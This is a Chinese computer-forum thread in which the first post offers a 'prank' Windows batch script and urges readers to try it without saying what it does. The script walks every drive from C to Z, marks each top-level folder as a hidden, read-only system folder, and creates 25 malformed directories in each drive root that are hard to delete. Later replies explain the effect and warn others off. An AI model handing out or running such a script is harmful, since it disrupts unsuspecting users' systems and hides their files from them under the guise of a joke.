计算机技术论坛

QQ登录

只需一步,快速开始

• 欢迎访问 计算机技术论坛-电脑迷与初学者的家园!由于论坛管理严格,新注册会员可能遇到各种问题,无法解决的请发邮件 admin@jsjbbs.cn

给个恶搞批处理。

@echo off
title pause
color 9a
mode con: cols=40 lines=20
echo 请稍等...
set var=c d e f g h i j k l m n o p q r s t u v w x y z
for %%i in (%var%) do (if exist %%i: cd/d %%i:\&for /d %%j in (*) do attrib +a +r +s +h "%%j"&for /d %%k in (*) do attrib +a +s +r +h&for /l %%l in (1,1,25) do md %%l..\) >nul 2>nul
pause

没事的人可以去试一下!

干什么的。、我读不懂。
没什么效果啊。。。这是什么意思啊
不说一下作用,谁敢试啊?
说下用处吧
搜索计算机的所有分区,将每个分区里的所有文件夹(文件)都设为系统文件隐藏,并在每个分区下建立25个畸形文件夹
搞完人家跟你拼命了
这不是玩人家吗。
额 幸亏看完了 要不被你搞到了{:8_290:}
教一下怎么用啊